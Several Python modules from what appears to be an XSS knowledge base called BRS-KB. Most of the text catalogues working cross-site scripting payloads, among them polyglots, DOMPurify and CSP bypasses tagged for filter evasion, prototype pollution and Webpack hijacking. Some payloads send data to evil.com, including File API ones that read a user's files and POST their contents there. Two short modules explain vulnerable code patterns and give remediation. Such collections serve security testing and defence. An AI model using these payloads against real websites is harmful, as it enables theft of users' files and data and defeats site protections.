        waf_evasion=False,
    ),
    "postmessage-location": PayloadEntry(
        payload='window.addEventListener("message", (e) => { if(e.data.redirect) location = e.data.url; })',
        contexts=["postmessage", "javascript", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="postMessage redirect",
        tags=["postmessage", "redirect", "location", "open"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Prototype Pollution Additional ===
PROTOTYPE_POLLUTION_PRIORITY = {
    "proto-merge-deep": PayloadEntry(
        payload='merge({}, JSON.parse(\'{"__proto__":{"isAdmin":true}}\'))',
        contexts=["prototype_pollution", "javascript", "json"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Deep merge prototype pollution",
        tags=["prototype", "pollution", "merge", "deep"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "proto-lodash-set": PayloadEntry(
        payload='_.set({}, "__proto__.xss", "<img src=x onerror=alert(1)>")',
        contexts=["prototype_pollution", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Lodash _.set prototype pollution",
        tags=["prototype", "pollution", "lodash", "set"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "proto-Object-assign": PayloadEntry(
        payload='Object.assign({}, {["__proto__"]: {polluted: true}})',
        contexts=["prototype_pollution", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Object.assign prototype pollution attempt",
        tags=["prototype", "pollution", "Object.assign", "attempt"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Mutation XSS Additional ===
MUTATION_XSS_PRIORITY = {
    "mxss-dompurify-bypass": PayloadEntry(
        payload="<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>-->",
        contexts=["mutation", "html_content", "sanitizer_api"],
        severity=Severity.CRITICAL,
        cvss_score=9.5,
        description="DOMPurify bypass via mXSS",
        tags=["mxss", "dompurify", "bypass", "sanitizer"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "mxss-innerhtml-reparse": PayloadEntry(
        payload="<div><svg></p><style><g/onload=alert(1)>",
        contexts=["mutation", "html_content", "svg"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="innerHTML reparse mXSS",
        tags=["mxss", "innerHTML", "reparse", "svg"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "mxss-namespace-switch": PayloadEntry(
        payload="<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>",
        contexts=["mutation", "html_content", "svg", "xml"],
        severity=Severity.HIGH,
        cvss_score=8.0,
        description="SVG namespace switch mXSS",
        tags=["mxss", "namespace", "svg", "cdata"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === CSP Bypass Additional ===
CSP_BYPASS_PRIORITY = {
    "csp-jsonp-callback": PayloadEntry(
        payload='<script src="https://trusted.com/api?callback=alert"></script>',
        contexts=["csp_bypass", "html_content", "javascript"],
        severity=Severity.HIGH,
        cvss_score=8.0,
        description="CSP bypass via JSONP callback",
        tags=["csp", "bypass", "jsonp", "callback"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "csp-angular-sandbox": PayloadEntry(
        payload='{{constructor.constructor("alert(1)")()}}',
        contexts=["csp_bypass", "template", "angular"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="CSP bypass via Angular sandbox escape",
        tags=["csp", "bypass", "angular", "sandbox"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "csp-script-gadget": PayloadEntry(
        payload='<script src="https://trusted.com/lib.js#\nalert(1)"></script>',
        contexts=["csp_bypass", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="CSP bypass via script gadget",
        tags=["csp", "bypass", "gadget", "script"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === DOM Clobbering Additional ===
DOM_CLOBBERING_PRIORITY = {
    "clobber-defaultView": PayloadEntry(
        payload='<img id="document" name="defaultView"><img id="document" name="cookie">',
        contexts=["dom_clobbering", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="DOM clobbering document.defaultView",
        tags=["clobbering", "document", "defaultView"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "clobber-form-elements": PayloadEntry(
        payload='<form id="test"><input id="action" value="javascript:alert(1)"><input id="submit"></form>',
        contexts=["dom_clobbering", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Form elements clobbering",
        tags=["clobbering", "form", "elements", "action"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Scriptless XSS Additional ===
SCRIPTLESS_PRIORITY = {
    "scriptless-dangling-markup": PayloadEntry(
        payload='<img src="https://evil.com/log?html=',
        contexts=["scriptless", "html_content"],
        severity=Severity.MEDIUM,
        cvss_score=6.5,
        description="Dangling markup injection for HTML exfil",
        tags=["scriptless", "dangling", "markup", "exfil"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "scriptless-css-exfil": PayloadEntry(
        payload='<style>input[value^="a"]{background:url(https://evil.com/a)}</style>',
        contexts=["scriptless", "html_content", "css"],
        severity=Severity.MEDIUM,
        cvss_score=6.0,
        description="CSS attribute selector exfil",
        tags=["scriptless", "css", "attribute", "selector"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "scriptless-link-prefetch": PayloadEntry(
        payload='<link rel="prefetch" href="https://evil.com/log">',
        contexts=["scriptless", "html_content"],
        severity=Severity.LOW,
        cvss_score=4.0,
        description="Link prefetch for tracking",
        tags=["scriptless", "link", "prefetch", "tracking"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Default Context Additional ===
DEFAULT_PRIORITY = {
    "default-body-onload": PayloadEntry(
        payload="<body onload=alert(1)>",
        contexts=["default", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Body onload event",
        tags=["default", "body", "onload", "event"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "default-input-onfocus": PayloadEntry(
        payload="<input onfocus=alert(1) autofocus>",
        contexts=["default", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Input autofocus onfocus",
        tags=["default", "input", "onfocus", "autofocus"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "default-marquee": PayloadEntry(
        payload="<marquee onstart=alert(1)>",
        contexts=["default", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Marquee onstart event",
        tags=["default", "marquee", "onstart", "event"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# Combined
PRIORITY_ENRICHMENT_PAYLOADS = {
    **REACT_PRIORITY_PAYLOADS,
    **VUE_PRIORITY_PAYLOADS,
    **JQUERY_PRIORITY_PAYLOADS,
    **FETCH_PRIORITY_PAYLOADS,
    **WEBSOCKET_PRIORITY_PAYLOADS,
    **ELECTRON_PRIORITY_PAYLOADS,
    **PDF_PRIORITY_PAYLOADS,
    **GRAPHQL_PRIORITY_PAYLOADS,
    **POSTMESSAGE_PRIORITY_PAYLOADS,
    **PROTOTYPE_POLLUTION_PRIORITY,
    **MUTATION_XSS_PRIORITY,
    **CSP_BYPASS_PRIORITY,
    **DOM_CLOBBERING_PRIORITY,
    **SCRIPTLESS_PRIORITY,
    **DEFAULT_PRIORITY,
}

PRIORITY_ENRICHMENT_TOTAL = len(PRIORITY_ENRICHMENT_PAYLOADS)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Polyglot Core Payloads
"""

from typing import Dict

from ..models import PayloadEntry


POLYGLOT_CORE_PAYLOADS: Dict[str, PayloadEntry] = {
    "polyglot_001": PayloadEntry(
        payload="javascript:/*--></title></style></textarea></script></xmp><iframe/src=javascript:alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_002": PayloadEntry(
        payload="javascript:/*--></title></style></textarea></script></xmp><body/onload=alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_003": PayloadEntry(
        payload="--></script><script>alert(1)</script><!--",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_004": PayloadEntry(
        payload="--></style><script>alert(1)</script><!--",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_005": PayloadEntry(
        payload="--></textarea><script>alert(1)</script><!--",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_006": PayloadEntry(
        payload="--></title><script>alert(1)</script><!--",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_007": PayloadEntry(
        payload="--></xmp><script>alert(1)</script><!--",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_008": PayloadEntry(
        payload="*/</style><script>alert(1)</script>/*",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_009": PayloadEntry(
        payload="*/{background:url(javascript:alert(1))}/*",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_010": PayloadEntry(
        payload="'></script><script>alert(1)</script>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_011": PayloadEntry(
        payload='"</script><script>alert(1)</script>',
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_012": PayloadEntry(
        payload="`</script><script>alert(1)</script>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_013": PayloadEntry(
        payload='" onmouseover="alert(1)" autofocus="',
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_014": PayloadEntry(
        payload="' onmouseover='alert(1)' autofocus='",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_015": PayloadEntry(
        payload='" onfocus="alert(1)" autofocus onclick="alert(1)" "',
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_016": PayloadEntry(
        payload="' onfocus='alert(1)' autofocus onclick='alert(1)' '",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_017": PayloadEntry(
        payload="javascript:alert(1)//\\",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_018": PayloadEntry(
        payload="javascript:alert(1)/*",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_019": PayloadEntry(
        payload="javascript:alert(1);void(0)",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_020": PayloadEntry(
        payload="javascript:alert(1)&amp;",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_021": PayloadEntry(
        payload="javascript:void(alert(1))",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_022": PayloadEntry(
        payload="javascript:throw(alert(1))",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_023": PayloadEntry(
        payload="tcl:alert(1)",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_024": PayloadEntry(
        payload="data:text/html,<iframe src=javascript:alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_025": PayloadEntry(
        payload="javascript:/**/alert(1)",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_026": PayloadEntry(
        payload="javascript://alert(1)",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_027": PayloadEntry(
        payload="javascript:void%20alert(1)",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_028": PayloadEntry(
        payload="&lt;scr\\x69pt&gt;alert(1)&lt;/scr\\x69pt&gt;",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_029": PayloadEntry(
        payload="<IMG SRC=x ONERROR=alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_030": PayloadEntry(
        payload="<SVG ONLOAD=alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_031": PayloadEntry(
        payload="<ScRiPt>ALeRt(1)</ScRiPt>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_032": PayloadEntry(
        payload="<img src=x onerror=/**/alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_033": PayloadEntry(
        payload="<iframe/src=javascript:alert(1)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_034": PayloadEntry(
        payload="></script><script>alert(1)</script>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_035": PayloadEntry(
        payload="\\x22;alert(1);//",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_036": PayloadEntry(
        payload="jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_037": PayloadEntry(
        payload="/**/alert(1)/**/;/**/\\n/**/\\r/**/\\t/**/\\f/**/\\v/**/\\0",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_038": PayloadEntry(
        payload='"><svg/onload=/**/alert(1)//>',
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_039": PayloadEntry(
        payload="';/*!*/alert(/*!*/1/*!*/)/*!*/;//",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_040": PayloadEntry(
        payload="`);alert(1);//",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_041": PayloadEntry(
        payload="${7*7}{{7*7}}<%=7*7%>${{7*7}}#{7*7}",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_042": PayloadEntry(
        payload='[class^="alert(1)"]',
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_043": PayloadEntry(
        payload="javascript:/*--></title></style></textarea></script></xmp><svg/onload=alert(/XSS/)>",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_044": PayloadEntry(
        payload="data:text/html,<script>alert(1)</script><!--",
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
    "polyglot_045": PayloadEntry(
        payload='"},alert(1),{"',
        contexts=["html_content", "js_string", "html_attribute"],
        severity="medium",
        cvss_score=5.5,
        description="Polyglot payload",
        tags=["polyglot", "universal"],
        waf_evasion=False,
    ),
}



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Knowledge Base: Private Methods/Fields XSS
"""

DETAILS = {
    "title": "Cross-Site Scripting (XSS) via Private Methods/Fields",
    "severity": "medium",
    "cvss_score": 6.8,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
    "reliability": "high",
    "cwe": ["CWE-79"],
    "owasp": ["A03:2021"],
    "tags": ["xss", "private", "class-fields", "encapsulation", "es2022"],
    "description": """
Private methods and fields (ES2022) provide encapsulation. XSS vulnerabilities occur when
user input controls private field values or private method execution without validation.

SEVERITY: MEDIUM
Encapsulation can be bypassed if private fields contain user-controlled data that is later rendered.
""",
    "attack_vector": """
PRIVATE FIELD INJECTION:
class MyClass {
  #data = userInput;  // XSS if #data is rendered
  getData() {
    return this.#data;
  }
}
const instance = new MyClass();
element.innerHTML = instance.getData();  // XSS

PRIVATE METHOD INJECTION:
class MyClass {
  #process(data) {
    return data;  // XSS if data is user-controlled
  }
  publicMethod(input) {
    return this.#process(input);
  }
}
const instance = new MyClass();
element.innerHTML = instance.publicMethod(userInput);  // XSS

PRIVATE STATIC FIELD:
class MyClass {
  static #config = userInput;  // XSS if config is rendered
}
element.innerHTML = MyClass.getConfig();  // XSS

PRIVATE FIELD WITH EVAL:
class MyClass {
  #code = userInput;
  execute() {
    eval(this.#code);  // XSS
  }
}

PRIVATE FIELD INNERHTML:
class MyClass {
  #html = userInput;
  render() {
    element.innerHTML = this.#html;  // XSS
  }
}
""",
    "remediation": """
DEFENSE:

1. Sanitize data before storing in private fields
2. Sanitize data before returning from private methods
3. Use textContent instead of innerHTML
4. Validate private field values
5. Implement input validation

SAFE PATTERN:
class MyClass {
  #data = '';
  constructor(input) {
    this.#data = DOMPurify.sanitize(input);  // Sanitize on input
  }
  getData() {
    return this.#data;  // Safe
  }
  render() {
    element.textContent = this.#data;  // Safe
  }
}

VALIDATION:
class MyClass {
  #data = '';
  setData(input) {
    if (input.length > 1000) {
      throw new Error('Input too long');
    }
    this.#data = DOMPurify.sanitize(input);
  }
}

OWASP REFERENCES:
- CWE-79: Cross-site Scripting
- ES2022 Private Fields Specification
""",
}



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

HTML Parser Edge Cases Context - Data Module
"""

DESCRIPTION = """
HTML parser has various edge cases and quirks that can be exploited.
Vulnerabilities occur when user input exploits parser edge cases,
allowing XSS attacks through unexpected parsing behavior.

Vulnerability occurs when:
- User input exploits parser normalization
- Malformed HTML is parsed unexpectedly
- Parser error recovery creates vulnerabilities
- Tag name edge cases are exploited
- Attribute parsing quirks are used

Common edge cases:
- Tag name case sensitivity
- Unclosed tags
- Nested tags
- Comment parsing
- DOCTYPE manipulation
- Script tag variations
"""

ATTACK_VECTOR = """
1. Case variation:
   <ScRiPt>alert(1)</ScRiPt>

2. Unclosed tag:
   <div><script>alert(1)</div>

3. Nested tags:
   <div><div><script>alert(1)</script></div></div>

4. Comment injection:
   <!--<script>alert(1)</script>-->

5. DOCTYPE injection:
   <!DOCTYPE USER_INPUT>

6. Script tag variation:
   <script src="data:text/javascript,alert(1)"></script>
"""

REMEDIATION = """
1. Use strict HTML parsers
2. Normalize HTML before parsing
3. Validate tag structure
4. Use Content Security Policy (CSP)
5. Sanitize all user input
6. Audit parser behavior
7. Test edge cases regularly
8. Use framework-safe HTML parsing
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Ultra Deep XSS Payloads

The deepest knowledge - obscure browser behaviors, forgotten APIs,
race conditions, timing attacks, and techniques from ancient scrolls.

Refactored into 4 parts for better maintainability.
"""

from .brs_kb_advanced_research_part1 import BRS_KB_ULTRA_DEEP_PAYLOADS_PART1
from .brs_kb_advanced_research_part2 import BRS_KB_ULTRA_DEEP_PAYLOADS_PART2
from .brs_kb_advanced_research_part3 import BRS_KB_ULTRA_DEEP_PAYLOADS_PART3
from .brs_kb_advanced_research_part4 import BRS_KB_ULTRA_DEEP_PAYLOADS_PART4


BRS_KB_ULTRA_DEEP_PAYLOADS = {
    **BRS_KB_ULTRA_DEEP_PAYLOADS_PART1,
    **BRS_KB_ULTRA_DEEP_PAYLOADS_PART2,
    **BRS_KB_ULTRA_DEEP_PAYLOADS_PART3,
    **BRS_KB_ULTRA_DEEP_PAYLOADS_PART4,
}

BRS_KB_ULTRA_DEEP_TOTAL_PAYLOADS = len(BRS_KB_ULTRA_DEEP_PAYLOADS)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2026-01-10 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Webpack & Micro-Frontend Hijacking Payloads
"""

from ..models import PayloadEntry

WEBPACK_HIJACK_PAYLOADS = {
    "webpack_jsonp_hijack": PayloadEntry(
        payload="window.webpackJsonp.push([['app'],{'./src/index.js':function(m,e,r){alert(1)}},[['./src/index.js']]]);",
        contexts=["javascript", "module_federation"],
        severity="critical",
        cvss_score=9.0,
        description="Hijacking Webpack 4 webpackJsonp global to execute arbitrary code",
        tags=["webpack", "jsonp", "hijack", "rce"],
        reliability="high",
        attack_surface="global-scope",
    ),
    "webpack_chunk_load_override": PayloadEntry(
        payload="window.webpackChunk_name.push([[1],{},function(r){r.e=function(){return Promise.resolve()};alert(1)}])",
        contexts=["javascript", "module_federation"],
        severity="critical",
        cvss_score=9.0,
        description="Webpack 5 chunk loading override XSS",
        tags=["webpack5", "chunk-loading", "hijack"],
        reliability="high",
        attack_surface="global-scope",
    ),
    "module_federation_share_scope": PayloadEntry(
        payload="window.__webpack_share_scopes__.default.react.get=()=>Promise.resolve(()=>({createElement:()=>alert(1)}));",
        contexts=["javascript", "module_federation"],
        severity="critical",
        cvss_score=9.5,
        description="Polluting Module Federation shared scope to poison React dependency",
        tags=["webpack", "module-federation", "supply-chain", "poisoning"],
        reliability="medium",
        attack_surface="shared-memory",
    ),
    "single_spa_mount_override": PayloadEntry(
        payload="System.import('app-name').then(m=>{m.mount=()=>alert(1)})",
        contexts=["javascript", "module_federation"],
        severity="high",
        cvss_score=8.5,
        description="Overriding Single-SPA lifecycle method",
        tags=["single-spa", "systemjs", "lifecycle"],
        reliability="medium",
        attack_surface="global-registry",
    ),
}

WEBPACK_HIJACK_TOTAL = len(WEBPACK_HIJACK_PAYLOADS)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

File API XSS Payloads
"""

from ..models import PayloadEntry


FILE_API_PAYLOADS = {
    "file_1": PayloadEntry(
        payload="<input type=file onchange=fetch('//evil.com/log?file='+this.files[0].name)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.0,
        description="File name leak",
        tags=["file", "leak", "name"],
        reliability="high",
    ),
    "file_2": PayloadEntry(
        payload="<input type=file onchange=\"var r=new FileReader();r.onload=()=>fetch('//evil.com/log',{method:'POST',body:r.result});r.readAsText(this.files[0])\">",
        contexts=["html_content"],
        severity="critical",
        cvss_score=9.0,
        description="File content exfil",
        tags=["file", "exfil", "content"],
        reliability="high",
    ),
    "file_3": PayloadEntry(
        payload="<script>document.ondrop=e=>{e.preventDefault();[...e.dataTransfer.files].forEach(f=>{var r=new FileReader();r.onload=()=>fetch('//evil.com/log',{method:'POST',body:r.result});r.readAsText(f)})};document.ondragover=e=>e.preventDefault()</script>",
        contexts=["html_content", "javascript"],
        severity="critical",
        cvss_score=9.0,
        description="Drag-drop file exfil",
        tags=["file", "exfil", "dragdrop"],
        reliability="high",
    ),
}

FILE_API_PAYLOADS_TOTAL = len(FILE_API_PAYLOADS)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Web Components XSS Payloads
"""

from ..models import PayloadEntry


WEB_COMPONENT_PAYLOADS = {
    "wc_1": PayloadEntry(
        payload="<script>customElements.define('x-xss',class extends HTMLElement{connectedCallback(){alert(1)}})</script><x-xss></x-xss>",
        contexts=["html_content"],
        severity="critical",
        cvss_score=8.5,
        description="Custom element with XSS in connectedCallback",
        tags=["web-components", "custom-elements", "connectedCallback"],
        reliability="high",
    ),
    "wc_2": PayloadEntry(
        payload="<script>customElements.define('x-xss',class extends HTMLElement{constructor(){super();this.innerHTML='<img src=x onerror=alert(1)>'}})</script><x-xss></x-xss>",
        contexts=["html_content"],
        severity="critical",
        cvss_score=8.5,
        description="Custom element with innerHTML XSS",
        tags=["web-components", "custom-elements", "innerHTML"],
        reliability="high",
    ),
    "wc_3": PayloadEntry(
        payload="<template id=t><img src=x onerror=alert(1)></template><script>document.body.appendChild(document.getElementById('t').content.cloneNode(true))</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Template content injection",
        tags=["web-components", "template", "clone"],
        reliability="high",
    ),
}

